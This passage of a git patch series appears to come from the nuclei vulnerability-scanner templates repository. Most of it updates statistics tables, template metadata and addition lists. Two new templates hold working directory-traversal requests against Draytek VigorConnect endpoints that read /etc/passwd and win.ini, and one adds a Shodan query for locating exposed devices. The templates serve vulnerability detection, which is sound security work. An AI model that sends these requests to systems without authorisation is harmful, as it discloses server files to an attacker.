dvr | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sitefinity | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| mappress | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| blockfrost | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| ecosys | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| portal | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 07b8f2d2b1..98ed1f88da 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | From 46ccee2102434cac039e861773bef2a3badf41b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 09:00:48 +0000 Subject: [PATCH 15/68] Auto README Update [Fri May 13 09:00:48 UTC 2022] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index da6f508012..8026d4b3ab 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | -| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | -| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | -| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | -| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 | +| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 | +| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 | +| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 | +| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | | +| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | | +| rce | 291 | princechaddha | 133 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | | +| tech | 271 | gy741 | 118 | default-logins | 95 | | | | | +| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | | -**260 directories, 3520 files**. +**261 directories, 3543 files**. From 2623f06714fb2d2d9b3e2952d6dd7f129e3c7424 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 13 May 2022 18:07:02 +0900 Subject: [PATCH 16/68] Create CVE-2021-20124.yaml --- CVE-2021-20124.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 CVE-2021-20124.yaml diff --git a/CVE-2021-20124.yaml b/CVE-2021-20124.yaml new file mode 100644 index 0000000000..83e0c0386a --- /dev/null +++ b/CVE-2021-20124.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-20124 + +info: + name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + reference: + - https://www.tenable.com/security/research/tra-2021-42 + - https://www.cvedetails.com/cve/CVE-2021-20124 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-20124 + cwe-id: CWE-22 + tags: cve,cve2021,draytek,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" + - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 From 69d72179dbf87cec4a50bfb6e09d5799d9bdcefe Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 13 May 2022 18:07:21 +0900 Subject: [PATCH 17/68] Create CVE-2021-20123.yaml --- CVE-2021-20123.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 CVE-2021-20123.yaml diff --git a/CVE-2021-20123.yaml b/CVE-2021-20123.yaml new file mode 100644 index 0000000000..f9e9b8b2ca --- /dev/null +++ b/CVE-2021-20123.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-20123 + +info: + name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet + author: 0x_Akoko + severity: high + description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + reference: + - https://www.tenable.com/security/research/tra-2021-42 + - https://www.cvedetails.com/cve/CVE-2021-20123/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-20123 + cwe-id: CWE-22 + tags: cve,cve2021,draytek,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" + - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "for 16-bit app support" + condition: or + + - type: status + status: + - 200 From c6f34b351b73cb3588cea4bfdb0950af8ed32c9c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 15:25:01 +0530 Subject: [PATCH 18/68] Update and rename CVE-2021-20123.yaml to cves/2021/CVE-2021-20123.yaml --- .../2021/CVE-2021-20123.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) rename CVE-2021-20123.yaml => cves/2021/CVE-2021-20123.yaml (62%) diff --git a/CVE-2021-20123.yaml b/cves/2021/CVE-2021-20123.yaml similarity index 62% rename from CVE-2021-20123.yaml rename to cves/2021/CVE-2021-20123.yaml index f9e9b8b2ca..4f7029d7fc 100644 --- a/CVE-2021-20123.yaml +++ b/cves/2021/CVE-2021-20123.yaml @@ -4,7 +4,8 @@ info: name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet author: 0x_Akoko severity: high - description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. + description: | + A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. reference: - https://www.tenable.com/security/research/tra-2021-42 - https://www.cvedetails.com/cve/CVE-2021-20123/ @@ -13,7 +14,10 @@ info: cvss-score: 7.5 cve-id: CVE-2021-20123 cwe-id: CWE-22 - tags: cve,cve2021,draytek,lfi + metadata: + verified: true + shodan-query: http.html:"VigorConnect" + tags: cve,cve2021,draytek,lfi,vigorconnect requests: - method: GET @@ -21,15 +25,20 @@ requests: - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything" - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything" + stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: word + part: header + words: + - "application/octet-stream" + - type: status status: - 200 From 1f24834a1b6a9abc235d18685642081dbd489c90 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 09:57:41 +0000 Subject: [PATCH 19/68] Auto Generated New Template Addition List [Fri May 13 09:57:41 UTC 2022] :robot: --- .new-additions | 24 +----------------------- 1 file changed, 1 insertion(+), 23 deletions(-) diff --git a/.new-additions b/.new-additions index 81bcfa9f90..ecf3c1ca3b 100644 --- a/.new-additions +++ b/.new-additions @@ -1,23 +1 @@ -cves/2018/CVE-2018-19326.yaml -cves/2020/CVE-2020-36510.yaml -cves/2022/CVE-2022-1040.yaml -cves/2022/CVE-2022-1221.yaml -cves/2022/CVE-2022-29548.yaml -cves/2022/CVE-2022-30525.yaml -exposed-panels/privx-panel.yaml -exposed-panels/umbraco-login.yaml -exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml -exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml -exposures/configs/msmtp-config.yaml -misconfiguration/unauthorized-h3csecparh-login.yaml -technologies/cloudflare-nginx-detect.yaml -technologies/dedecms-detect.yaml -technologies/ecology-detect.yaml -technologies/jspxcms-detect.yaml -token-spray/api-moonpay.yaml -vulnerabilities/other/ecsimagingpacs-rce.yaml -vulnerabilities/other/gnuboard-sms-xss.yaml -vulnerabilities/wordpress/age-gate-open-redirect.yaml -vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml -vulnerabilities/wordpress/wp-security-open-redirect.yaml -vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +cves/2021/CVE-2021-20123.yaml From 0481125ecbf3f0d24a5b766dfb33db9a61db2efb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 15:35:36 +0530 Subject: [PATCH 20/68] Update and rename CVE-2021-20124.yaml to cves/2021/CVE-2021-20124.yaml --- .../2021/CVE-2021-20124.yaml | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) rename CVE-2021-20124.yaml => cves/2021/CVE-2021-20124.yaml (80%) diff --git a/CVE-2021-20124.yaml b/cves/2021/CVE-2021-20124.yaml similarity index 80% rename from CVE-2021-20124.yaml rename to cves/2021/CVE-2021-20124.yaml index 83e0c0386a..28d24c9763 100644 --- a/CVE-2021-20124.yaml +++ b/cves/2021/CVE-2021-20124.yaml @@ -7,13 +7,17 @@ info: description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges. reference: - https://www.tenable.com/security/research/tra-2021-42 + - https://www.draytek.com/products/vigorconnect/ - https://www.cvedetails.com/cve/CVE-2021-20124 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-20124 cwe-id: CWE-22 - tags: cve,cve2021,draytek,lfi + metadata: + verified: true + shodan-query: http.html:"VigorConnect" + tags: cve,cve2021,draytek,lfi,vigorconnect requests: - method: GET @@ -21,15 +25,20 @@ requests: - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd" - "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini" + stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: word + part: header + words: + - "application/octet-stream" + - type: status status: - 200 From a3fbef4bfc2fa27f59b23013b8507a1dc531a9ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 13:05:10 +0000 Subject: [PATCH 21/68] Auto Generated New Template Addition List [Fri May 13 13:05:10 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ecf3c1ca3b..f054a196e8 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ cves/2021/CVE-2021-20123.yaml +cves/2021/CVE-2021-20124.yaml From bdf23f23242fe6c7d4b0724f557544a8956dc5bd Mon Sep 17 00:00:00 2001 From: geeknik <466878+geeknik@users.noreply.github.com> Date: Fri, 13 May 2022 15:14:37 -0500 Subject: [PATCH 22/68] Update api-loqate.yaml fix false positive. --- token-spray/api-loqate.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/token-spray/api-loqate.yaml b/token-spray/api-loqate.yaml index 5588a1d2e8..7ebd015c07 100644 --- a/token-spray/api-loqate.yaml +++ b/token-spray/api-loqate.yaml @@ -20,3 +20,5 @@ requests: negative: true words: - 'Unknown key' + - 'Forbidden' + condition: or From 581b7a627bbf2969723989fda856c21a117e8c2a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 13 May 2022 16:26:43 -0400 Subject: [PATCH 23/68] Dashboard Content Enhancements (#4381) Dashboard Content Enhancements --- cnvd/2019/CNVD-2019-19299.yaml | 9 ++++++++- cnvd/2019/CNVD-2019-32204.yaml | 10 ++++++++-- cnvd/2020/CNVD-2020-62422.yaml | 4 ++-- cnvd/2020/CNVD-2020-68596.yaml | 11 +++++++++-- cnvd/2021/CNVD-2021-01931.yaml | 2 +- cnvd/2021/CNVD-2021-09650.yaml | 9 ++++++++- cnvd/2021/CNVD-2021-26422.yaml | 7 +++++++ cnvd/2021/CNVD-2021-28277.yaml | 4 ++-- cnvd/2022/CNVD-2022-03672.yaml | 9 ++++++++- cves/2007/CVE-2007-4504.yaml | 4 ++-- cves/2010/CVE-2010-0696.yaml | 3 ++- cves/2010/CVE-2010-2122.yaml | 4 ++-- cves/2010/CVE-2010-3203.yaml | 2 +- cves/2015/CVE-2015-4694.yaml | 4 ++-- cves/2017/CVE-2017-11512.yaml | 4 ++-- cves/2017/CVE-2017-15363.yaml | 2 +- cves/2017/CVE-2017-7269.yaml | 2 +- cves/2017/CVE-2017-7615.yaml | 2 +- cves/2017/CVE-2017-9841.yaml | 7 +++++-- cves/2018/CVE-2018-0127.yaml | 7 +++++-- cves/2018/CVE-2018-1000226.yaml | 5 ++++- cves/2018/CVE-2018-1000861.yaml | 8 +++++--- cves/2018/CVE-2018-10562.yaml | 6 ++++-- cves/2018/CVE-2018-12031.yaml | 6 ++++-- cves/2018/CVE-2018-1207.yaml | 12 ++++++------ cves/2018/CVE-2018-12300.yaml | 2 +- cves/2018/CVE-2018-12634.yaml | 7 +++++-- cves/2018/CVE-2018-1273.yaml | 4 +++- cves/2018/CVE-2018-13379.yaml | 8 +++++--- cves/2018/CVE-2018-13980.yaml | 2 +- cves/2018/CVE-2018-14064.yaml | 4 +++- cves/2018/CVE-2018-14916.yaml | 6 ++++-- cves/2018/CVE-2018-15517.yaml | 4 ++-- cves/2018/CVE-2018-16167.yaml | 4 +++- cves/2018/CVE-2018-16763.yaml | 7 +++++-- cves/2018/CVE-2018-16836.yaml | 8 +++++--- cves/2018/CVE-2018-17246.yaml | 9 +++++---- cves/2018/CVE-2018-17431.yaml | 9 ++++++--- cves/2018/CVE-2018-18925.yaml | 9 +++++---- cves/2018/CVE-2018-20985.yaml | 9 ++++++--- cves/2018/CVE-2018-2894.yaml | 8 ++++++-- cves/2018/CVE-2018-3810.yaml | 10 ++++++---- cves/2018/CVE-2018-6008.yaml | 4 ++-- cves/2018/CVE-2018-7600.yaml | 8 +++++--- cves/2018/CVE-2018-7602.yaml | 7 ++++--- cves/2018/CVE-2018-7662.yaml | 2 +- cves/2018/CVE-2018-9161.yaml | 5 +++-- cves/2018/CVE-2018-9205.yaml | 2 +- cves/2019/CVE-2019-16123.yaml | 2 +- cves/2019/CVE-2019-16759.yaml | 2 +- cves/2019/CVE-2019-17506.yaml | 5 ++--- cves/2019/CVE-2019-19908.yaml | 4 ++-- cves/2019/CVE-2019-19985.yaml | 6 +++--- cves/2019/CVE-2019-20141.yaml | 4 ++-- cves/2019/CVE-2019-3912.yaml | 2 +- cves/2019/CVE-2019-9955.yaml | 2 +- cves/2020/CVE-2020-18268.yaml | 2 +- cves/2020/CVE-2020-22840.yaml | 2 +- cves/2020/CVE-2020-24391.yaml | 5 ++--- cves/2020/CVE-2020-24550.yaml | 2 +- cves/2020/CVE-2020-24579.yaml | 2 +- cves/2020/CVE-2020-25495.yaml | 4 ++-- cves/2020/CVE-2020-29453.yaml | 2 +- cves/2020/CVE-2020-3452.yaml | 2 +- cves/2020/CVE-2020-35736.yaml | 6 +++--- cves/2020/CVE-2020-35749.yaml | 2 +- cves/2020/CVE-2020-36365.yaml | 2 +- cves/2020/CVE-2020-36510.yaml | 2 +- cves/2020/CVE-2020-9054.yaml | 4 ++-- cves/2020/CVE-2020-9490.yaml | 5 ++--- cves/2021/CVE-2021-21816.yaml | 4 ++-- cves/2021/CVE-2021-24997.yaml | 7 +++---- cves/2021/CVE-2021-25118.yaml | 2 +- cves/2021/CVE-2021-30151.yaml | 4 ++-- cves/2021/CVE-2021-39316.yaml | 7 +++---- cves/2021/CVE-2021-41293.yaml | 2 +- cves/2022/CVE-2022-0540.yaml | 2 +- cves/2022/CVE-2022-1119.yaml | 4 ++-- cves/2022/CVE-2022-1221.yaml | 4 +++- exposed-panels/gogs-login.yaml | 2 +- exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml | 2 +- exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml | 2 +- exposures/files/gogs-install-exposure.yaml | 2 +- headless/window-name-domxss.yaml | 2 +- misconfiguration/aem/aem-setpreferences-xss.yaml | 4 ++-- misconfiguration/akamai-arl-xss.yaml | 4 ++-- misconfiguration/ampps-dirlisting.yaml | 2 +- misconfiguration/d-link-arbitary-fileread.yaml | 2 +- vulnerabilities/moodle/moodle-filter-jmol-xss.yaml | 4 ++-- vulnerabilities/moodle/moodle-xss.yaml | 2 +- vulnerabilities/netsweeper/netsweeper-rxss.yaml | 2 +- vulnerabilities/oracle/oracle-ebs-xss.yaml | 2 +- vulnerabilities/other/bems-api-lfi.yaml | 4 ++-- vulnerabilities/other/ecsimagingpacs-rce.yaml | 8 ++++++-- vulnerabilities/other/eyelock-nano-lfd.yaml | 4 ++-- vulnerabilities/other/java-melody-xss.yaml | 2 +- vulnerabilities/other/kafdrop-xss.yaml | 4 ++-- vulnerabilities/other/kyocera-m2035dn-lfi.yaml | 4 ++-- vulnerabilities/other/microstrategy-ssrf.yaml | 4 ++-- vulnerabilities/other/nginx-module-vts-xss.yaml | 2 +- vulnerabilities/other/nuuo-file-inclusion.yaml | 2 +- vulnerabilities/other/odoo-cms-redirect.yaml | 5 +++-- vulnerabilities/other/oliver-library-lfi.yaml | 4 ++-- .../other/pbootcms-database-file-download.yaml | 2 +- vulnerabilities/other/pmb-directory-traversal.yaml | 4 ++-- vulnerabilities/other/pmb-local-file-disclosure.yaml | 2 +- vulnerabilities/other/wems-manager-xss.yaml | 4 ++-- .../wordpress/admin-word-count-column-lfi.yaml | 2 +- vulnerabilities/wordpress/aspose-file-download.yaml | 4 ++-- .../wordpress/aspose-ie-file-download.yaml | 4 ++-- .../wordpress/aspose-pdf-file-download.yaml | 4 ++-- .../wordpress/aspose-words-file-download.yaml | 4 ++-- vulnerabilities/wordpress/cherry-file-download.yaml | 5 ++--- vulnerabilities/wordpress/diarise-theme-lfi.yaml | 4 ++-- .../wordpress/flow-flow-social-stream-xss.yaml | 2 +- vulnerabilities/wordpress/hb-audio-lfi.yaml | 2 +- .../wordpress/nativechurch-wp-theme-lfd.yaml | 4 ++-- vulnerabilities/wordpress/sniplets-xss.yaml | 2 +- .../wordpress/wordpress-wordfence-lfi.yaml | 2 +- .../wordpress-wordfence-waf-bypass-xss.yaml | 2 +- .../wordpress/wordpress-zebra-form-xss.yaml | 4 ++-- vulnerabilities/wordpress/wp-code-snippets-xss.yaml | 2 +- .../wordpress/wp-full-path-disclosure.yaml | 3 ++- vulnerabilities/wordpress/wp-haberadam-idor.yaml | 2 +- vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 6 +++--- .../wordpress/wp-revslider-file-download.yaml | 4 ++-- .../wordpress/wp-woocommerce-file-download.yaml | 2 +- workflows/gogs-workflow.yaml | 2 +- 128 files changed, 317 insertions(+), 222 deletions(-) diff --git a/cnvd/2019/CNVD-2019-19299.yaml b/cnvd/2019/CNVD-2019-19299.yaml index 86ad86ae1f..114cc01a3b 100644 --- a/cnvd/2019/CNVD-2019-19299.yaml +++ b/cnvd/2019/CNVD-2019-19299.yaml @@ -1,12 +1,17 @@ id: CNVD-2019-19299 info: - name: Zhiyuan A8 Arbitrary File Write (RCE) + name: Zhiyuan A8 - Remote Code Execution author: daffainfo severity: critical + description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue. reference: - https://www.cxyzjd.com/article/guangying177/110177339 - https://github.com/sectestt/CNVD-2019-19299 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: zhiyuan,cnvd,cnvd2019,rce requests: @@ -45,3 +50,5 @@ requests: - 'contains(body_1, "htmoffice operate")' - 'contains(body_2, "Windows IP")' condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2019/CNVD-2019-32204.yaml b/cnvd/2019/CNVD-2019-32204.yaml index f85de55b08..ec365a5f8c 100644 --- a/cnvd/2019/CNVD-2019-32204.yaml +++ b/cnvd/2019/CNVD-2019-32204.yaml @@ -1,12 +1,16 @@ id: CNVD-2019-32204 info: - name: Fanwei e-cology <= 9.0 Remote Code Execution + name: Fanwei e-cology <=9.0 - Remote Code Execution author: daffainfo severity: critical - description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. + description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system. reference: - https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: fanwei,cnvd,cnvd2019,rce requests: @@ -22,3 +26,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2020/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml index ba3c739d17..0194c6d8b8 100644 --- a/cnvd/2020/CNVD-2020-62422.yaml +++ b/cnvd/2020/CNVD-2020-62422.yaml @@ -1,7 +1,7 @@ id: CNVD-2020-62422 info: - name: Seeyon readfile(CNVD-2020-62422) + name: Seeyon - Arbitrary File Retrieval author: pikpikcu severity: medium reference: @@ -29,4 +29,4 @@ requests: part: body words: - "ctpDataSource.password" - condition: and \ No newline at end of file + condition: and diff --git a/cnvd/2020/CNVD-2020-68596.yaml b/cnvd/2020/CNVD-2020-68596.yaml index 8294f8519b..b1d96de058 100644 --- a/cnvd/2020/CNVD-2020-68596.yaml +++ b/cnvd/2020/CNVD-2020-68596.yaml @@ -1,11 +1,16 @@ id: CNVD-2020-68596 info: - name: WeiPHP 5.0 Path Traversal + name: WeiPHP 5.0 - Path Traversal author: pikpikcu - severity: critical + description: WeiPHP 5.0 is susceptible to directory traversal attacks. + severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: weiphp,lfi,cnvd,cnvd2020 requests: @@ -41,3 +46,5 @@ requests: - WeiPHP - DB_PREFIX condition: and + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml index 40ff5da4f2..af7aa8ed08 100644 --- a/cnvd/2021/CNVD-2021-01931.yaml +++ b/cnvd/2021/CNVD-2021-01931.yaml @@ -1,7 +1,7 @@ id: CNVD-2021-01931 info: - name: Ruoyi Management System Arbitrary File Download + name: Ruoyi Management System - Arbitrary File Retrieval author: daffainfo,ritikchaddha severity: high reference: diff --git a/cnvd/2021/CNVD-2021-09650.yaml b/cnvd/2021/CNVD-2021-09650.yaml index 8c24b28302..528666e80d 100644 --- a/cnvd/2021/CNVD-2021-09650.yaml +++ b/cnvd/2021/CNVD-2021-09650.yaml @@ -1,11 +1,16 @@ id: CNVD-2021-09650 info: - name: Ruijie EWEB Gateway Platform Command Execution + name: Ruijie EWEB Gateway Platform - Remote Command Injection author: daffainfo severity: critical + description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. reference: - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: ruijie,cnvd,cnvd2021,rce requests: @@ -23,3 +28,5 @@ requests: name: http words: - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-26422.yaml b/cnvd/2021/CNVD-2021-26422.yaml index e159383415..8ceb9e5c8d 100644 --- a/cnvd/2021/CNVD-2021-26422.yaml +++ b/cnvd/2021/CNVD-2021-26422.yaml @@ -4,9 +4,14 @@ info: name: eYouMail - Remote Code Execution author: daffainfo severity: critical + description: eYouMail is susceptible to a remote code execution vulnerability. reference: - https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: eyoumail,rce,cnvd,cnvd2021 requests: @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cnvd/2021/CNVD-2021-28277.yaml 